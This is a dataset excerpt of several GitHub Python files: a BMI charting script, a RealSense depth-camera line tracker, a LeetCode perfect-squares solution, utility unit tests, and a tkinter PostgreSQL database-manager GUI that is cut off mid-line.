lDate = myDate\n \n if readings.get(item['User']):\n readings[item['User']].append([item['Date'], item['BMI']]) \n else:\n readings[item['User']] = [[item['Date'], item['BMI']]]\n\n return readings, bDate, lDate\n\ndef dataPrep(readings, bDate, lDate):\n\n chartDim = {}\n labels = []\n\n start_date = bDate\n end_date = lDate\n delta = timedelta(days=1)\n\n while start_date <= end_date:\n\n month = str(start_date.month) # months from 1-12\n day = str(start_date.day)\n year = str(start_date.year)\n\n aDateString = year + \"-\" + month + \"-\" + day\n labels.append(aDateString);\n\n for key, values in readings.items():\n\n if not chartDim.get(key):\n chartDim[key]=[]; \n \n filled = False\n\n for item in values:\n\n parts=[ int(x) for x in item[0].split('-') ]\n mydate = datetime(parts[0], parts[1], parts[2]) \n \n if mydate == start_date:\n \n chartDim[key].append(item[1])\n filled = True\n\n else:\n\n if mydate > start_date:\n if not filled:\n chartDim[key].append(-1)\n break\n\n start_date += delta\n\n return chartDim, labels\n\n#readings, bDate, lDate = getReadings(data)\n\n#print(readings, bDate, lDate)\n\n#chartDim, labels = dataPrep(readings, bDate, lDate)\n\n#print(chartDim, labels)\n\ndb2 = connection['bmi']\n\ndef getAverage(db):\n\n aveDict = {}\n sum=0\n count=0\n resCursor = db.readings.find({}) \n readings = resCursor[0][\"readings\"]\n \n for key, values in readings.items():\n\n for value in values:\n sum += float(value[1])\n count += 1\n \n aveDict[key]=sum/count\n \n return aveDict\n\naveDict = getAverage(db2)\nprint(aveDict)\n\n","repo_name":"paulhjwu/ICT239_Stage2","sub_path":"Jean's/ICT239_final/BMI/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27976434380","text":"import pyrealsense2 as rs\nimport copy\nimport argparse\nimport cv2\nimport numpy as np\nimport onnxruntime\nimport math\nimport json\nfrom scipy.spatial.transform import Rotation as R\n\n# result is wrong...\ndef xyz2qua(vec):\n '''\n return quaternion angle to xyz=(1, 0, 0)\n :param vec:\n :return: qua\n '''\n x, y, z = vec\n zdegree = math.degrees(math.atan(z / x))\n ydegree = math.degrees(math.atan(y / x))\n # rot = R.from_euler('zyx', [0, -ydegree, zdegree], degrees=True) # to unity coord\n theta = [0, -ydegree, zdegree] # to unity coord\n rot = R.from_euler('xyz', theta, degrees=True)\n qua = rot.as_quat()\n return qua\n\ndef save_json(lines):\n info = {\"LineFeatures\": []}\n for idx,(p1, p2) in enumerate(lines):\n # opencv to Unity3D coordinate\n y, x, z = p1\n yy, xx, zz = p2\n y, yy = -y, -yy\n\n scale = math.sqrt((x-xx)**2+(y-yy)**2+(z-zz)**2)\n center = (x+xx)/(2*scale), (y+yy)/(2*scale), (z+zz)/(2*scale)\n vec = xx-x, yy-y, zz-z\n qua = xyz2qua(vec)\n\n info[\"LineFeatures\"].append(\n {\n \"ID\": idx,\n \"Type\": \"LineFeature\",\n \"Position\": {\n \"x\": center[0],\n \"y\": center[1],\n \"z\": center[2]\n },\n \"Rotation\": {\n \"x\": qua[0],\n \"y\": qua[1],\n \"z\": qua[2],\n \"w\": qua[3]\n },\n \"Scale\": {\n \"x\": scale,\n \"y\": scale,\n \"z\": scale\n },\n \"Positions\": [\n {\n \"x\": x/scale,\n \"y\": y/scale,\n \"z\": z/scale\n },\n {\n \"x\": xx/scale,\n \"y\": yy/scale,\n \"z\": zz/scale\n }\n ]\n }\n )\n json_object = json.dumps(info, indent=4)\n\n # Writing to sample.json\n with open(\"sample.json\", \"w\") as outfile:\n outfile.write(json_object)\n\n return\n\ndef get_depth(point, depth_map):\n def generate_points(point):\n x, y = point\n shift_pix = 10\n return [(x, y),\n (x+shift_pix, y), (x, y+shift_pix),\n (x-shift_pix, y), (x, y-shift_pix),\n (x+shift_pix, y+shift_pix), (x+shift_pix, y-shift_pix),\n (x-shift_pix, y+shift_pix), (x-shift_pix, y-shift_pix)]\n\n points = generate_points(point)\n depths = []\n for i, j in points:\n depth = depth_map[min(max(i,0), depth_map.shape[0]-1), min(max(0,j), depth_map.shape[1]-1)]\n if depth>1e-10:\n depths.append(depth)\n\n if depths:\n return min(depths)\n else:\n return 0\n\ndef camera2world(lines, depth_map, depth_intrin):\n world_lines = []\n # print(f'depth_scale {depth_scale}')\n for line, _ in lines:\n (x, y, xx, yy) = line.astype(int)\n\n # print(x,y,xx,yy, line, depth_map.shape)\n if (x0 and xx>0 and y>0 and yy>0):\n pass\n else:\n continue\n\n # z = depth_map[y, x]*depth_scale\n z = get_depth((y, x), depth_map)*depth_scale\n dx, dy, dz = rs.rs2_deproject_pixel_to_point(\n depth_intrin, [y, x], z)\n\n # zz = depth_map[yy, xx] * depth_scale\n zz = get_depth((yy, xx), depth_map) * depth_scale\n dxx, dyy, dzz = rs.rs2_deproject_pixel_to_point(\n depth_intrin, [yy, xx], zz)\n\n world_lines.append([(dx, dy, dz), (dxx, dyy, dzz)])\n\n return world_lines\n\ndef shift_point(box):\n \"\"\"\n shitf for better iou calculation\n :param box: xyxy 左上右下\n :return xyxy:\n \"\"\"\n xmin, ymin, xmax, ymax = box[0], box[1], box[2], box[3]\n thred = 20\n if xmax - xmin < thred:\n xmax += 100 - (xmax - xmin)\n if ymax - ymin < thred:\n ymax += 100 - (ymax - ymin)\n return xmin, ymin, xmax, ymax\n\n\ndef cal_iou(box1, box2):\n \"\"\"\n :param box1: xyxy 左上右下\n :param box2: xyxy\n :return:\n \"\"\"\n\n x1min, y1min, x1max, y1max = shift_point(box1)\n x2min, y2min, x2max, y2max = shift_point(box2)\n\n # 计算两个框的面积\n s1 = (y1max - y1min + 1.) * (x1max - x1min + 1.)\n s2 = (y2max - y2min + 1.) * (x2max - x2min + 1.)\n\n # 计算相交部分的坐标\n xmin = max(x1min, x2min)\n ymin = max(y1min, y2min)\n xmax = min(x1max, x2max)\n ymax = min(y1max, y2max)\n\n inter_h = max(ymax - ymin + 1, 0)\n inter_w = max(xmax - xmin + 1, 0)\n\n intersection = inter_h * inter_w\n union = s1 + s2 - intersection\n\n # 计算iou\n iou = intersection / union\n return iou\n\nclass M_LSD:\n def __init__(self, modelpath, conf_thres=0.5, dist_thres=20.0):\n # Initialize model ['CUDAExecutionProvider', 'CPUExecutionProvider']\n self.onnx_session = onnxruntime.InferenceSession(modelpath, providers=['CUDAExecutionProvider'])\n self.input_name = self.onnx_session.get_inputs()[0].name\n self.output_names = [self.onnx_session.get_outputs()[i].name for i in range(3)]\n\n self.input_shape = self.onnx_session.get_inputs()[0].shape ### n,h,w,c\n self.input_height = self.input_shape[1]\n self.input_width = self.input_shape[2]\n self.conf_threshold = conf_thres\n self.dist_threshold = dist_thres\n\n def prepare_input(self, image):\n resized_image = cv2.resize(image, dsize=(self.input_width, self.input_height), interpolation=cv2.INTER_AREA)\n input_image = np.concatenate([resized_image, np.ones([self.input_height, self.input_width, 1])], axis=-1)\n input_image = np.expand_dims(input_image, axis=0).astype('float32')\n return input_image\n\n def detect(self, image, pre_lines=None, start_id=0, depth_map=None, depth_intrin=None):\n \"\"\"\n :param image: xyxy\n :param lines: [(xyxy, idx)]\n :return:\n \"\"\"\n h_ratio, w_ratio = [image.shape[0] / self.input_height, image.shape[1] / self.input_width]\n input_image = self.prepare_input(image)\n\n # Perform inference on the image\n result = self.onnx_session.run(self.output_names, {self.input_name: input_image})\n\n pts = result[0][0]\n pts_score = result[1][0]\n vmap = result[2][0]\n\n start = vmap[:, :, :2]\n end = vmap[:, :, 2:]\n dist_map = np.sqrt(np.sum((start - end) ** 2, axis=-1))\n\n segments_list = []\n for center, score in zip(pts, pts_score):\n y, x = center\n distance = dist_map[y, x]\n if score > self.conf_threshold and distance > self.dist_threshold:\n disp_x_start, disp_y_start, disp_x_end, disp_y_end = vmap[y, x, :]\n x_start = x + disp_x_start\n y_start = y + disp_y_start\n x_end = x + disp_x_end\n y_end = y + disp_y_end\n segments_list.append([x_start, y_start, x_end, y_end])\n\n lines = 2 * np.array(segments_list) # 256 > 512\n lines_with_id = []\n\n try:\n lines[:, 0] = lines[:, 0] * w_ratio\n lines[:, 1] = lines[:, 1] * h_ratio\n lines[:, 2] = lines[:, 2] * w_ratio\n lines[:, 3] = lines[:, 3] * h_ratio\n\n # Draw Line\n dst_image = copy.deepcopy(image)\n for line in lines:\n x_start, y_start, x_end, y_end = [int(val) for val in line]\n\n max_iou = 0\n thred = 0.8\n nearest = False\n for point, idx in pre_lines:\n iou = cal_iou(line, point)\n\n if iou > max_iou:\n nearest = point, idx\n max_iou = iou\n\n if max_iou > thred:\n cur_id = nearest[1]\n # info = f'old {cur_id} iou{max_iou:.2f}'\n info = f'id {cur_id}'\n lines_with_id.append((line, cur_id))\n else:\n cur_id = start_id\n # info = f'new {cur_id} iou{max_iou:.2f}'\n info = f'id {cur_id}'\n lines_with_id.append((line, cur_id))\n start_id += 1\n\n\n cv2.line(dst_image, (x_start, y_start), (x_end, y_end), [0, 0, 255], 3)\n\n center = ((x_start + x_end) // 2, (y_start + y_end) // 2)\n global depth_scale\n center_depth = depth_map[center[1], center[0]]*depth_scale if depth_map is not None else False\n\n world_coord = camera2world([(line, cur_id)], depth_map, depth_intrin)\n try:\n (dx, dy, dz), (dxx, dyy, dzz) = world_coord[0]\n distance = math.sqrt(((dx-dxx) ** 2) + ((dy-dyy) ** 2) + ((dz-dzz) ** 2))\n info += f' l:{distance:.2f}'\n\n org = center # (x1, y1)\n font = cv2.FONT_HERSHEY_SIMPLEX\n dst_image = cv2.putText(dst_image, f'{info}', org, font,\n fontScale=0.5, color=(255, 0, 0), thickness=2, lineType=cv2.LINE_AA)\n lines_with_id.append((line, start_id))\n start_id += 1\n # info = info + f' no depth' if not center_depth else info + f' depth{center_depth:.2f}'\n except:\n pass\n\n\n except:\n dst_image = copy.deepcopy(image)\n pass\n return dst_image, lines_with_id, start_id\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--modelpath', type=str, default='.\\M-LSD-onnxrun-cpp-py\\weights\\model_512x512_large.onnx', help=\"onnx filepath\")\n parser.add_argument('--confThreshold', default=0.5, type=float, help='class confidence')\n parser.add_argument('--distThreshold', default=20.0, type=float, help='dist threshold')\n args = parser.parse_args()\n\n # using M-LSD model\n print('using M-LSD')\n detector = M_LSD(args.modelpath, conf_thres=args.confThreshold, dist_thres=args.distThreshold)\n\n # Configure depth and color streams\n print('Configuring realsense')\n pipeline = rs.pipeline()\n config = rs.config()\n\n # Get device product line for setting a supporting resolution\n pipeline_wrapper = rs.pipeline_wrapper(pipeline)\n pipeline_profile = config.resolve(pipeline_wrapper)\n device = pipeline_profile.get_device()\n device_product_line = str(device.get_info(rs.camera_info.product_line))\n\n found_rgb = False\n for s in device.sensors:\n if s.get_info(rs.camera_info.name) == 'RGB Camera':\n found_rgb = True\n break\n if not found_rgb:\n print(\"The demo requires Depth camera with Color sensor\")\n exit(0)\n\n config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\n if device_product_line == 'L500':\n config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\n else:\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\n # Start streaming\n print('starting streaming')\n # pipeline.start(config)\n\n profile = pipeline.start(config)\n global depth_scale\n depth_scale = profile.get_device().first_depth_sensor().get_depth_scale()\n\n # set depth parameters\n # 0 for depth sensor, 1 for camera sensor\n sensor = profile.get_device().query_sensors()[0]\n sensor.set_option(rs.option.min_distance, 0)\n # sensor.set_option(rs.option.confidence_threshold, 1)\n # # sensor.set_option(rs.option.max_distance, 190)\n # sensor.set_option(rs.option.laser_power, 95)\n # sensor.set_option(rs.option.noise_filtering, 1)\n # sensor.set_option(rs.option.receiver_gain, 18)\n # sensor.set_option(rs.option.post_processing_sharpening, 1)\n # sensor.set_option(rs.option.pre_processing_sharpening, 0)\n # sensor.set_option(rs.option.global_time_enabled, 1.0)\n\n # for color sensor\n sensor = profile.get_device().query_sensors()[1]\n sensor.set_option(rs.option.global_time_enabled, 1.0)\n\n align_to = rs.stream.depth\n align = rs.align(align_to)\n\n count = 0\n lines = []\n start_id = 0\n try:\n while count< 50 :\n\n count += 1\n\n # Get frameset of color and depth\n frames = pipeline.wait_for_frames()\n # frames.get_depth_frame() is a 640x360 depth image\n\n # Align the depth frame to color frame\n aligned_frames = align.process(frames)\n\n # Get aligned frames\n depth_frame = aligned_frames.get_depth_frame() # aligned_depth_frame is a 640x480 depth image\n color_frame = aligned_frames.get_color_frame()\n\n # Convert images to numpy arrays\n depth_colormap = depth_image = np.asanyarray(depth_frame.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n depth_colormap_dim = depth_colormap.shape\n color_colormap_dim = color_image.shape\n\n # If depth and color resolutions are different, resize color image to match depth image for display\n if depth_colormap_dim != color_colormap_dim:\n # print(depth_colormap_dim, color_colormap_dim)\n color_image = cv2.resize(color_image, dsize=(depth_colormap_dim[1], depth_colormap_dim[0]),\n interpolation=cv2.INTER_AREA)\n\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n\n # line detection\n\n depth_intrin = aligned_frames.get_color_frame().profile.as_video_stream_profile().intrinsics\n # color_image = detector.detect(color_image, depth_image)\n color_image, lines, start_id = detector.detect(color_image, lines, start_id, depth_image, depth_intrin)\n\n if lines:\n world_lines = camera2world(lines, depth_image, depth_intrin)\n save_json(world_lines)\n cv2.imwrite('last_frame.png', color_image)\n # print(world_lines)\n\n depth_colormap_dim = depth_colormap.shape\n color_colormap_dim = color_image.shape\n\n # If depth and color resolutions are different, resize color image to match depth image for display\n if depth_colormap_dim != color_colormap_dim:\n color_image = cv2.resize(color_image, dsize=(depth_colormap_dim[1], depth_colormap_dim[0]), interpolation=cv2.INTER_AREA)\n\n images = np.hstack((color_image, depth_colormap))\n\n # Show images\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', images)\n cv2.waitKey(1)\n\n finally:\n # Stop streaming\n pipeline.stop()","repo_name":"dizhima/LineTracking","sub_path":"mlsd_depth_tracking.py","file_name":"mlsd_depth_tracking.py","file_ext":"py","file_size_in_byte":15234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32846784288","text":"class Solution:\n def numSquares1(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n # 定义状态数组. 每个状态的含义都是 最小的组成数字\n dp = [0] * (n + 1)\n\n # 进行状态上的计算转移。就像贝诺蔓塔一样的不断累上算。\n for i in range(1, n + 1):\n dp[i] = i # 最坏情况是加1,也就是所有1加一起,我们的目标当然是最少比较好\n # 尝试更新,减少那种累计数字\n for j in range(1, int(i ** 0.5) + 1):\n dp[i] = min(dp[i], dp[i - j * j] + 1)\n return dp[n]\n\nif __name__ == '__main__':\n n = 13\n solution = Solution()\n res = solution.numSquares1(n)\n print(res)","repo_name":"chenximei/LeetCode","sub_path":"279 Perfect Squares.py","file_name":"279 Perfect Squares.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72291990884","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_utils\n------------\n\nTests for `complexity.utils` module.\n\"\"\"\n\nimport shutil\nimport sys\n\nfrom complexity import utils\n\nif sys.version_info[:2] < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n\nclass TestUtils(unittest.TestCase):\n\n def test_make_sure_path_exists(self):\n self.assertTrue(utils.make_sure_path_exists('/usr/'))\n self.assertTrue(utils.make_sure_path_exists('tests/blah'))\n self.assertTrue(utils.make_sure_path_exists('tests/trailingslash/'))\n self.assertFalse(\n utils.make_sure_path_exists(\n '/this-dir-does-not-exist-and-cant-be-created/'\n )\n )\n shutil.rmtree('tests/blah/')\n shutil.rmtree('tests/trailingslash/')\n\n def test_unicode_open(self):\n \"\"\" Test unicode_open(filename, *args, **kwargs). \"\"\"\n\n unicode_text = u\"\"\"Polish: Ą Ł Ż\nChinese: 倀 倁 倂 倃 倄 倅 倆 倇 倈\nMusical Notes: ♬ ♫ ♯\"\"\"\n\n with utils.unicode_open('tests/files/unicode.txt') as f:\n opened_text = f.read()\n self.assertEqual(unicode_text, opened_text)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"audreyfeldroy/complexity","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"52"} +{"seq_id":"69799962084","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import exc\nfrom config import auth\nimport psycopg2\n\ndef set_engine(login=auth['login'], password=auth['password'], db_name='project_db'):\n return create_engine('postgresql+psycopg2://{}:{}@localhost/{}'.format(login, password, db_name))\n\ndef show_error(error_text: str, window_to_destroy):\n messagebox.showerror(\"Error\", \"{}\".format(error_text))\n window_to_destroy.destroy()\n\ntry:\n engine = set_engine()\n cursor = engine.connect()\nexcept sqlalchemy.exc.OperationalError:\n print(\"DEBUG:: Database doesn't exists or username/password incorrect\")\nelse:\n print(\"DEBUG:: SQLalchemy connected to default database\")\n\n\nroot = Tk()\nroot.geometry('400x250')\nroot.title('Senku app')\nroot.iconbitmap('Python-icon.ico')\n\n#Database list managment\ndb_listbox = Listbox()\ndb_list = list()\nfor item in list(cursor.execute('select * from databases')):\n db_list.append(list(item)[0])\ncurrent_database = 0\n\nfor item in db_list:\n db_listbox.insert(END, item)\n\ndef create_database():\n def creation():\n if name.get():\n if name.get() in db_list:\n show_error(\"Such a database already exists\", create_window)\n else:\n try:\n query = '''select create_db('{}');'''.format(name.get())\n cursor.execute(query)\n db_list.append(name.get())\n db_listbox.insert(END, name.get())\n create_window.destroy()\n except psycopg2.errors.SqlclientUnableToEstablishSqlconnection:\n print(\"DEBUG:: Error while creating database: сould not establish connection\")\n show_error(\"Could not establish connection\", create_window)\n else:\n show_error(\"The input field is empty\", create_window)\n\n create_window = Toplevel(root)\n create_window.title('Create new database')\n create_window.geometry('250x150')\n create_window.iconbitmap('Python-icon.ico')\n\n name = StringVar()\n title = Label(create_window, text='Enter database name')\n enter = Entry(create_window, textvariable=name)\n create = Button(create_window, text='Create database', width=16, command=creation)\n\n title.place(anchor=CENTER, x=125, y=25)\n enter.place(anchor=CENTER, x=125, y=50)\n create.place(anchor=CENTER, x=125, y=80)\n\n\ndef select_database():\n #global cursor\n global current_database\n try:\n index = db_listbox.curselection()[0]\n current_database = index\n messagebox.showinfo(\"Success\", \"You have successfully switched to '{}' database\".format(db_list[index]))\n #print(\"DEBUG:: Trying to connect to database with name {}\".format(db_list[index]))\n #engine = set_engine(db_name=db_list[index])\n #cursor = engine.connect()\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n except sqlalchemy.exc.OperationalError:\n print(\"DEBUG:: Database {} doesn't exists or username/password incorrect\".format(db_list[index]))\n else:\n print(\"DEBUG:: Switched to database with name - {}\".format(db_list[index]))\n \n\ndef delete_database():\n try:\n index = db_listbox.curselection()[0]\n if index == 0:\n messagebox.showerror(\"Error\", \"Unable to drop 'mother' database\")\n return\n query = '''select delete_db('{}');'''.format(db_list[index])\n cursor.execute(query)\n db_listbox.delete(index)\n db_list.remove(db_list[index])\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n except:\n messagebox.showerror(\"Error\", \"Delete error\")\n print(\"DEBUG:: Error deleting database with name - {}\".format(db_list[index]))\n else:\n messagebox.showinfo(\"Success\", \"Successfully deleted\")\n\n\ndef details():\n def open_table():\n def refresh_table():\n table.delete(*table.get_children())\n rows.clear()\n for item in cursor.execute(\"select * from get_{}('{}','')\".format(table_list[subindex], db_list[index])):\n rows.append(item)\n for row in rows:\n table.insert('', END, values=tuple(row))\n\n\n def search_in_table():\n if search_item.get():\n try:\n table.delete(*table.get_children())\n temp_rows = list()\n for item in cursor.execute(\"select * from get_{}('{}','{}')\".format(table_list[subindex], db_list[index], search_item.get())):\n temp_rows.append(item)\n for row in temp_rows:\n table.insert('', END, values=tuple(row))\n except:\n show_error(\"Something goes wrong\", table_window)\n else:\n refresh_table()\n \n\n def delete_rows():\n try:\n if table_list[subindex] == 'finances':\n messagebox.showerror(\"Error\", \"No rights to delete data from this table ({})\".format(table_list[subindex]))\n return\n for item in table.selection():\n item_text = table.item(item)['values']\n cursor.execute(\"select delete_rows('{}','{}','{}')\".format(db_list[index], table_list[subindex], item_text[0]))\n print('DEBUG:: Delete row with condition {}'.format(item_text[0]))\n refresh_table()\n except:\n messagebox.showerror(\"Error\", \"Error while deleting rows\")\n\n \n def add_data_to_rows():\n try:\n def add_data_to_db():\n for item in range(len(text_variables)):\n if not text_variables[item].get():\n messagebox.showerror(\"Error\", \"The input field is empty - {}\".format(headings[item]))\n return\n try:\n query_condition = ','.join(\"'''{}'''\".format(i.get()) for i in text_variables)\n cursor.execute(\"select insert_rows('{}','{}',array[{}])\".format(db_list[index], table_list[subindex], query_condition))\n #print(\"DEBUG:: query is {}\".format(query_condition))\n refresh_table()\n add_window.destroy()\n except:\n messagebox.showerror(\"Error\", \"Error while additing rows\")\n \n if table_list[subindex] == 'finances':\n messagebox.showerror(\"Error\", \"No rights to add data to this table ({})\".format(table_list[subindex]))\n return\n\n # Window setup\n add_window = Toplevel(table_window)\n add_window.title('{}'.format(table_list[subindex]))\n add_window.geometry('300x350')\n add_window.iconbitmap('Python-icon.ico')\n\n # Entry\n entry_list = list()\n text_variables = list()\n labels_list = list()\n for item in range(len(headings)):\n text_variables.append(StringVar())\n entry_list.append(Entry(add_window, textvariable=text_variables[item]))\n labels_list.append(Label(add_window, text='{} ({})'.format(headings[item], types[item])))\n\n # Buttons\n add_current_data = Button(add_window, text='Add data', command=add_data_to_db)\n\n # Places\n place_under_entry = len(entry_list)\n for item in range(len(entry_list)):\n labels_list[item].grid(column=0, row=item, pady=5)\n entry_list[item].grid(column=1, row=item, pady=5)\n add_current_data.grid(column=1, row=place_under_entry, pady=5)\n\n add_window.columnconfigure(0, weight=1)\n add_window.columnconfigure(1, weight=1)\n #add_window.rowconfigure(0, weight=1)\n except:\n show_error(\"Error while opening table '{}'\".format(table_list[subindex]), add_window)\n\n\n def update_data_in_rows():\n try:\n def update_data_in_db():\n for item in range(1, len(text_variables)):\n if not text_variables[item].get():\n messagebox.showerror(\"Error\", \"The input field is empty - {}\".format(headings[item]))\n return\n query_condition = ','.join(\"'{}'\".format(text_variables[i].get()) for i in range(1, len(text_variables)))\n cursor.execute(\"select update_rows('{}','{}','{}',array[{}])\".format(db_list[index], table_list[subindex], data[0], query_condition))\n #print(\"DEBUG:: query is {}\".format(query_condition))\n refresh_table()\n update_window.destroy()\n \n if table_list[subindex] == 'finances':\n messagebox.showerror(\"Error\", \"No rights to update data in this table ({})\".format(table_list[subindex]))\n return\n \n # Window setup\n update_window = Toplevel(table_window)\n update_window.title('{}'.format(table_list[subindex]))\n update_window.geometry('300x350')\n update_window.iconbitmap('Python-icon.ico')\n\n # Entry\n data = table.item(table.selection()[0])['values']\n entry_list = list()\n text_variables = list()\n labels_list = list()\n for item in range(len(headings)):\n text_variables.append(StringVar(update_window, data[item]))\n entry_list.append(Entry(update_window, textvariable=text_variables[item]))\n labels_list.append(Label(update_window, text='{} ({})'.format(headings[item], types[item])))\n\n # Buttons\n add_current_data = Button(update_window, text='Update data', command=update_data_in_db)\n\n # Places\n place_under_entry = (len(entry_list) - 1)\n for item in range(1, len(entry_list)):\n labels_list[item].grid(column=0, row=item-1, pady=5)\n entry_list[item].grid(column=1, row=item-1, pady=5)\n add_current_data.grid(column=1, row=place_under_entry, pady=5)\n\n update_window.columnconfigure(0, weight=1)\n update_window.columnconfigure(1, weight=1)\n #add_window.rowconfigure(0, weight=1)\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n except:\n show_error(\"Error while opening table '{}'\".format(table_list[subindex]), update_window)\n\n\n try:\n # Window setup\n subindex = table_listbox.curselection()[0]\n table_window = Toplevel(details_window)\n table_window.title('{}'.format(table_list[subindex]))\n table_window.geometry('700x600')\n table_window.iconbitmap('Python-icon.ico')\n\n # Headings\n headings = list()\n types = list()\n if table_list[subindex] == 'projects':\n headings = ['project_ID', 'project_category', 'project_name', 'project_dev', 'project_release_date', 'project_cost']\n types = ['integer', 'varchar', 'text', 'varchar', 'date', 'integer']\n else:\n for item in cursor.execute(\"select * from show_table_data('{}','{}')\".format(db_list[index], table_list[subindex])):\n headings.append(item[0])\n types.append(item[1])\n \n # Rows\n rows = list()\n for item in cursor.execute(\"select * from get_{}('{}','')\".format(table_list[subindex], db_list[index])):\n rows.append(item)\n\n # Tree frame\n tree_frame = Frame(table_window)\n\n # Treeview\n table = ttk.Treeview(master=tree_frame, show=\"headings\", selectmode=\"extended\", height=200)\n\n # Scroll\n horScroll = ttk.Scrollbar(tree_frame)\n horScroll.configure(command=table.xview, orient=HORIZONTAL)\n \n # Treeview setup\n table.configure(xscrollcommand=horScroll.set)\n table[\"columns\"] = headings\n table[\"displaycolumns\"] = headings\n for head in headings:\n table.heading(head, text=head, anchor=CENTER)\n table.column(head, anchor=CENTER)\n for row in rows:\n table.insert('', END, values=tuple(row))\n\n # Buttons\n search_button = Button(tree_frame, text='Search', command=search_in_table)\n add_data = Button(tree_frame, text='Add data', command=add_data_to_rows)\n delete_data = Button(tree_frame, text='Delete data', command=delete_rows)\n update_data = Button(tree_frame, text='Update data', command=update_data_in_rows)\n\n # Entry\n search_item = StringVar()\n search_enter = ttk.Entry(tree_frame, width=40)\n if table_list[subindex] == 'divisions':\n search_item.set('division_name')\n elif table_list[subindex] == 'positions':\n search_item.set('position_name')\n elif table_list[subindex] == 'buildings':\n search_item.set('address')\n elif table_list[subindex] == 'employees':\n search_item.set('employee_nam')\n elif table_list[subindex] == 'clients':\n search_item.set('client_name')\n elif table_list[subindex] == 'categories':\n search_item.set('category_name')\n elif table_list[subindex] == 'projects':\n search_item.set('project_name')\n elif table_list[subindex] == 'sales':\n search_item.set('sale_ID')\n elif table_list[subindex] == 'finances':\n search_item.set('fiscal_year')\n else: \n search_item.set('unknown')\n search_enter.config(textvariable=search_item)\n\n # Places\n tree_frame.grid(column=0, row=0, sticky=N, pady=25)\n table.grid(column=0, row=0, columnspan=3, rowspan=2, sticky=N)\n horScroll.grid(column=0, row=3, columnspan=3, sticky=W + E)\n search_enter.grid(column=1, row=4, sticky=N, pady=12.5, ipadx=0)\n search_button.grid(column=1, row=5, sticky=N, pady=5, ipadx=0)\n add_data.grid(column=1, row=6, sticky=N, pady=5, ipadx=0)\n delete_data.grid(column=1, row=7, sticky=N, pady=5, ipadx=0)\n update_data.grid(column=1, row=8, sticky=N, pady=5, ipadx=0)\n\n table_window.columnconfigure(0, weight=1)\n table_window.rowconfigure(0, weight=1)\n tree_frame.columnconfigure(0, weight=1)\n tree_frame.columnconfigure(1, weight=1)\n tree_frame.columnconfigure(2, weight=1)\n tree_frame.columnconfigure(3, weight=1)\n tree_frame.columnconfigure(4, weight=1)\n tree_frame.rowconfigure(1, weight=1)\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n except:\n show_error(\"Error while opening database '{}'\".format(db_list[index]), details_window)\n\n\n def clear_table():\n try:\n subindex = table_listbox.curselection()[0]\n if table_list[subindex] == 'finances':\n messagebox.showerror(\"Error\", \"Auto-filled table, you do not have permission to clear'\")\n return\n query = '''select clear_table('{}', '{}')'''.format(db_list[index], table_list[subindex])\n cursor.execute(query)\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n else:\n messagebox.showinfo(\"Success\", \"Table '{}' from database '{}' was cleaned up successfully\".format(table_list[subindex], db_list[index]))\n print(\"DEBUG:: Clear all rows table '{}' in database with name - {}\".format(table_list[subindex], db_list[index]))\n\n \n try:\n index = db_listbox.curselection()[0]\n if index == 0:\n messagebox.showerror(\"Error\", \"No rights to view the database\")\n return\n details_window = Toplevel(root)\n details_window.title('{}'.format(db_list[index]))\n details_window.geometry('400x250')\n details_window.iconbitmap('Python-icon.ico')\n\n # ListBox\n table_listbox = Listbox(details_window)\n table_list = list()\n for item in cursor.execute(\"select * from show_tables('{}');\".format(db_list[index])):\n table_list.append(item[0])\n for item in table_list:\n table_listbox.insert(END, item)\n #table_listbox.bind('<>', on_change)\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n except:\n show_error(\"Error while opening database '{}'\".format(db_list[index]), details_window)\n\n\n # Buttons\n open_tbl = Button(details_window, text='Open table', command=open_table)\n clear_tbl = Button(details_window, text='Crear table', command=clear_table)\n #search_in = Button(details_window, text='Search in')\n #alter_tuple = Button(details_window, text='Alter tuple')\n\n # Places\n table_listbox.place(anchor=N, x=150, y=25)\n open_tbl.place(anchor=NW, x=250, y=25)\n clear_tbl.place(anchor=NW, x=250, y=55)\n #search_in.place(anchor=NW, x=250, y=85)\n\n\ndef clear_all_tables():\n try:\n index = db_listbox.curselection()[0]\n if index == 0:\n messagebox.showerror(\"Error\", \"Unable to clear 'mother' database\")\n return\n query = '''select clear_all_table('{}')'''.format(db_list[index])\n cursor.execute(query)\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n else:\n messagebox.showinfo(\"Success\", \"'{}' database was cleaned up successfully\".format(db_list[index]))\n print(\"DEBUG:: Clear all rows from all tables in database with name - {}\".format(db_list[index]))\n\n\ncreate_db = Button(text='Create database', command=create_database)\nselect_db = Button(text='Select database', 